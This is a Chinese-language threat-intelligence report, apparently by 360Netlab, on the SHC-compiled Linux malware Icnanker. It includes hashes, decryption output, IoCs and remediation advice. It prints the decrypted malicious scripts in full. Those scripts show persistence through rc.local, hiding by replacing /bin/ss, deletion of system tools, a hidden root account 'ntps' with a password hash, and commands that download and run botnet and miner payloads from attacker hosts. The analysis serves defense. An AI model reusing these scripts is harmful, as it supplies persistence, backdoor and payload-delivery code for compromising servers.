背景介绍
2019年8月15日,360Netlab恶意流量检测系统发现一个通过SSH传播的未知ELF样本(5790dedae465994d179c63782e51bac1)产生了Elknot Botnet的相关网络流量,经分析这是一个使用了"SHC(Shell script compiler)"技术的Trojan-Downloader,作者是老牌玩家icnanker。icnanker其人于2015年被网络曝光,擅长脚本编程,性格高调,喜欢在脚本中留下名字,QQ等印记。
此次攻击,在我们看来没有太多的新颖性,因此并没有公开。
2020年3月12日,友商IntezerLab将一变种(6abe83ee8481b5ce0894d837eabb41df)检测为Icnanker。我们在看了这篇文档之后,觉得还是值得写一笔,因为IntezerLab漏了几个有意思的细节:
- SHC技术
- Icananker的分类及其功能
- Icananker分发的业务
概览
Icnanker是我们观察到的第一个使用SHC技术的家族,针对Linux平台,其名字源于脚本中作者的标识“by icnanker”字串。
目前Icnanker的样本按照功能可以分成2大类:
- Downloader
Downloader用于DDos,Miner等业务,目前下载的业务样本有Elknot Botnet, Xor Botnet, XMRMiner等,在Icnanker相关的HFS服务器上我们可以看到下载量已达20000+,且以每天500+的速度增长。
- Protector
Protector用于保护样本不被删除,目前用于保护Miner。
Downloader的主要功能如下:
- 持久化
- 隐藏自身
- 删除系统命令
- 增加新用户
- 下载执行具体业务样本
Protector的主要功能如下
- 删除系统命令,保护自身不被删除
逆向分析
本文的选取的分析对象为以下2个样本,
187fa428ed44f006df0c8232be4a6e4e为Miner的Protector,
5790dedae465994d179c63782e51bac1为Elknot Botnet的Downloader。
MD5:5790dedae465994d179c63782e51bac1
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=8368ecf43c311327ed1b8e011f25b87ceef7f065, stripped
Packer: No
Verdict:Malicious,Downloader
187fa428ed44f006df0c8232be4a6e4e
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, strippedPacker:No
Verdict:Malicious,Protector
在Windows平台有将BAT脚本打包成可执行文件的技术,称之为Bat2Exe,与其相似的,在Linux平台,可以用过开源的"SHC(Shell script compiler)"技术将Shell脚本打包成可执行文件。SHC使用RC4算法加密原始脚本,其生成的ELF文件有非常明显的特征:RC4解密函数一共调用14次;同时还存在许多独特的字符串,安全研究员可以依此判断ELF是否为SHC生成。
依前文所述,我们可以使用RC4算法手动的解出原始脚本,另一个选择是使用UnSHc直接解密出脚本
[*] Extracting each args address and size for the 14 arc4() calls with address [0x8048f65]...
[0] Working with var address at offset [0x80ed087] (0x2a bytes)
[1] Working with var address at offset [0x80ed0df] (0x1 bytes)
...............
[12] Working with var address at offset [0x80f1280] (0x13 bytes)
[13] Working with var address at offset [0x80f12b1] (0x13 bytes)
[*] Extracting password...
[+] PWD address found : [0x80f12ed]
[+] PWD size found : [0x100]
[*] Executing [/tmp/kjGnQn] to decrypt [5790dedae465994d179c63782e51bac1]
[*] Retrieving initial source code in [5790dedae465994d179c63782e51bac1.sh]
[*] All done!
...............
[*] Executing [/tmp/GRsVsP] to decrypt [187fa428ed44f006df0c8232be4a6e4e]
[*] Retrieving initial source code in [187fa428ed44f006df0c8232be4a6e4e.sh]
[*] All done!
Protector(187fa428ed44f006df0c8232be4a6e4e.sh)
#!/bin/bash
cp -f /usr/bin/chattr /usr/bin/lockr
cp -f /usr/bin/chattr /usr/bin/.locks
cp -f /usr/bin/.locks /usr/bin/lockr
chmod 777 /usr/bin/lockr
chmod 777 /usr/bin/.locks
lockr +i /usr/bin/lockr >/dev/null 2>&1
lockr +i /usr/bin/.locks >/dev/null 2>&1
.locks -i /usr/bin/lockr;chmod 777 /usr/bin/lockr
lockr +i /usr/bin/lockr >/dev/null 2>&1
cp -f /usr/bin/lsattr /usr/bin/lockrc
cp -f /usr/bin/lsattr /usr/bin/.locksc
cp -f /usr/bin/.locksc /usr/bin/lockrc
chmod 777 /usr/bin/lockrc
chmod 777 /usr/bin/.locksc
lockr +i /usr/bin/lockrc >/dev/null 2>&1
lockr +i /usr/bin/.locksc >/dev/null 2>&1
.locks -i /usr/bin/lockrc;chmod 777 /usr/bin/lockrc
lockr +i /usr/bin/lockrc >/dev/null 2>&1
rm -rf /usr/bin/lsattr
rm -rf /usr/bin/chattr
lockr +a /var/spool/cron/crontabs/root
lockr +i /var/spool/cron/crontabs/root
lockr +a /var/spool/cron/root
lockr +i /var/spool/cron/root
lockr +i /usr/lib/.cache/
lockr +i /usr/lib/.cache
rm -f $0
在此脚本中我们可以清楚的看到系统命令chattr,lsattr被重命名,被删除,同时Miner所在的目录.cache被保护起来了,加上immutable属性防止被删除。
Downloader(5790dedae465994d179c63782e51bac1.sh)
------------from 5790dedae465994d179c63782e51bac1.sh----------
...............
echo "byicnanker 2228668564" > $Config
tempfile=`cat $Config | awk '{print $1}'`
filetemp="/usr/bin/$tempfile" #现马的路径
filename=`date +%s%N | md5sum | head -c 10`
filepath="/usr/bin/$filename" #新马的路径
tempbash=`cat $Config | awk '{print $2}'`
bashtemp="/usr/bin/$tempbash" #现脚本路径
bashname=`date +%s%N | md5sum | head -c 10`
bashpath="/usr/bin/$bashname" #新脚本路径
...............
此脚本中有着典型的icnanker风格,我们可以清楚地看到icnanker标识,QQ,中文注释等。
由于脚本是明文,不存在混淆,所以功能都是一目了然的,主要有5个功能。
- 持久化,通过re.local实现自启动。
# by icnanker -----------------------------------------------
Repeatstart=`cat /etc/rc.local | grep 'start'| wc -l`
if [ $Repeatstart != 1 ];then
lockr -i /etc/rc.local;sed -i '/start/d' /etc/rc.local
fi
if [ -z "`cat /etc/rc.local | grep "$bashtemp"`" ]; then
if [ -z "`cat /etc/rc.local | grep "$exit0"`" ]; then
lockr -i /etc/;lockr -i /etc/rc.local
echo "$bashpath start" >> /etc/rc.local
else
lockr -i /etc/;lockr -i /etc/rc.local
sed -i "s|exit 0|$bashpath start|" /etc/rc.local
echo "exit 0">>/etc/rc.local
fi
fi
- 隐藏自身,使得ss,ps,netstat等管理工具都无法探测到样本相关的进程,网络连接。
if [ -f /bin/ss ];then
if [ ! -f "$iss" ];then
if [ ! -f "$issbak" ];then
lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/
cp -f /bin/ss $issbak
cp -f /bin/ss $iss
else
cp -f $issbak $iss
fi
chmod 777 $iss;chmod 777 $issbak
lockr +i $issbak >/dev/null 2>&1
lockr +i $iss >/dev/null 2>&1
else
if [ ! -f "$issbak" ];then
lockr -i /usr/bin/;cp -f $iss $issbak
lockr +i $issbak >/dev/null 2>&1
fi
if [ -z "`cat /bin/ss | grep $Address`" ]; then
lockr -i /bin/;lockr -i /bin/ss
echo '#!/bin/sh' > /bin/ss
echo 'iss|grep -v "'$Address'"' >> /bin/ss
echo 'exit' >> /bin/ss
chmod 777 /bin/ss;lockr +i /bin/ss >/dev/null 2>&1
fi
fi
fi
- 删除系统指令,增加修复难度。
lockr -i /usr/bin/;
lockr -i /usr/bin/wget;
rm -f /usr/bin/wget;
lockr -i /usr/bin/chattr;
rm -f /usr/bin/chattr
- 增加新用户(ntps),方便后续控制受害者机器
# by icnanker -----------------------------------------------
if [ -z "`cat /etc/passwd|grep "ntps"`" ]; then
lockr -i /etc/;lockr -i /etc/passwd #ntps
echo 'ntps:x:0:1:ntps:/root:/bin/bash' >> /etc/passwd
lockr -i /etc/;lockr +i /etc/passwd >/dev/null 2>&1
fi
if [ -z "`cat /etc/shadow|grep "ntps"`" ]; then
lockr -i /etc/;lockr -i /etc/shadow #tianyong
echo 'ntps:$6$J6RdL6Xh$udhpd5iErOxXyZSERCi0NOtoXE9J095xDRo4DJfCoTEsImcxype6iltDL8pTG7w/7Gbp9Ohrii9O.4NnxqG/h.:16583:0:99999:7:::' >> /etc/shadow
lockr -i /etc/;lockr +i /etc/shadow >/dev/null 2>&1
fi
- 下载执行具体业务样本,此处为Elknot Botnet。
# by icnanker -----------------------------------------------
iptable=`iptables -L INPUT | grep "$Address" | grep 'ACCEPT'`
if [ -z "$iptable" ];then
iptables -I INPUT -s $Address -j ACCEPT
else
iptables -D INPUT -s $Address -j DROP
fi
process=`ips -ef | grep "$tempfile" | grep -v "grep" | wc -l`
if [ $process != 1 ];then
if [ ! -f "$filebak" ];then
lockr -i /usr/bin/;lockr -i /usr/bin/htrdpm;rm -f /usr/bin/htrdpm
cd /usr/bin/;dget http[://hfs.ubtv.xyz:22345/htrdpm
cd $path;mv -f /usr/bin/htrdpm $filepath
else
cp -f $filebak $filepath
fi
Runkillallconnect
chmod 777 $filepath
nohup $filepath >/dev/null 2>&1 &
fi
至此,Icnanker实现了开机自启动,能够持续控制受害者,拥有隐蔽性强,不易被检测,难修复等特点,同时Icnanker的配置也非常灵活,从一个业务迁移到另一个业务时,只需改变业务所要解析的网络地址及业务样本地址即可。
以elknot VS miner为例
elknot
ResolveIP=`nslookup [ddd.ubtv.xyz|grep "Address: "|awk '{print $2}'`
if [ -z "$ResolveIP" ];then
lockr -i /etc/;lockr -i /etc/resolv.conf
echo 'nameserver 114.114.114.114' > /etc/resolv.conf
echo 'nameserver 8.8.8.8' >> /etc/resolv.conf
echo 'nameserver 8.8.4.4' >> /etc/resolv.conf
lockr +i /etc/resolv.conf >/dev/null 2>&1
service network restart;sleep 1
Address=`nslookup ddd.ubtv.xyz|grep "Address: "|awk '{print $2}'`
else
Address="$ResolveIP"
fi
dget http[://hfs.ubtv.xyz:22345/htrdpm
-------------------------------------------VS----------------------------------------
miner
ResolveIP=`nslookup p[ool.supportxmr.com|grep "Address: "|awk '{print $2}'`
if [ -z "$ResolveIP" ];then
lockr -i /etc/;lockr -i /etc/resolv.conf
echo 'nameserver 114.114.114.114' > /etc/resolv.conf
echo 'nameserver 8.8.8.8' >> /etc/resolv.conf
echo 'nameserver 8.8.4.4' >> /etc/resolv.conf
lockr +i /etc/resolv.conf >/dev/null 2>&1
service network restart;sleep 1
Address=`nslookup p[ool.supportxmr.com|grep "Address: "|awk '{print $2}'`
else
Address="$ResolveIP"
fi
dget http[://xz.jave.xyz:22345/.xm
目前观测到的Downloader及其业务如下所示,当前的主要业务为miner。
| filename | md5 | payload type | payload url |
|---|---|---|---|
| 80 | 5790dedae465994d179c63782e51bac1 | elknot botnet | http[://hfs.ubtv.xyz:22345/htrdpm |
| .ds1;.ds2 | 6abe83ee8481b5ce0894d837eabb41df | miner | http[://xz.jave.xyz:22345/.xm |
| .ssh | 89cd1ebfa5757dca1286fd925e0762de | elknot botnet | http[://hfs.ubtv.xyz:22345/htrdpm |
| 19880 | d989e81c4eb23c1e701024ed26f55849 | elknot botnet | http[://hfs.ubtv.xyz:22345/htrdps |
业务样本
Icnanker的业务样本存在其HFS服务上,目前观测到的都是老牌家族:Elknot Botnet, Xor Botnet,以及XMR的矿机。
-
Elknot Botnet
filename md5 c2 htrdps 5c90bfbae5c030da91c9054ecb3194b6 ubt.ubtv.xyz:19880, jav.jave.xyz:6001 kcompact0 eec19f1639871b6e6356e7ee05db8a94 sys.jave.xyz:1764, jav.jave.xyz:6001 -
Xor.DDoS Botnet
filename md5 c2 ss 0764da93868218d6ae999ed7bd66a98e 8uch.jave.xyz:3478,8uc1.jave.xyz:1987,8uc2.ubtv.xyz:2987 -
Miner
filename md5 c2 sh 17ac3bd2753b900367cb9ee4068fe0c1 .xm 765a0899cb87400e8a27ab572f3cdd61
处置建议
我们建议用户根据Icnanker的帐号创建,文件名及与HFS服务器的网络通信,判断是否感染,然后清理它的相关进程,文件。
相关安全和执法机构,可以邮件联系netlab[at]360.cn交流更多信息。
联系我们
感兴趣的读者,可以在 Twitter 或者在微信公众号 360Netlab 上联系我们。
IoC list
Sample MD5
5790dedae465994d179c63782e51bac1
6abe83ee8481b5ce0894d837eabb41df
89cd1ebfa5757dca1286fd925e0762de
d989e81c4eb23c1e701024ed26f55849
5c90bfbae5c030da91c9054ecb3194b6
eec19f1639871b6e6356e7ee05db8a94
0764da93868218d6ae999ed7bd66a98e
17ac3bd2753b900367cb9ee4068fe0c1
765a0899cb87400e8a27ab572f3cdd61
187fa428ed44f006df0c8232be4a6e4e
CC
ubt.ubtv.xyz:19880 #Elknot
sys.jave.xyz:1764 #Elknot
jav.jave.xyz:6001 #Elknot
8uch.jave.xyz:3478 #Xor.DDoS
8uc1.jave.xyz:1987 #Xor.DDoS
8uc2.ubtv.xyz:2987 #Xor.DDoS
xz.jave.xyz:22345 #Icnanker HFS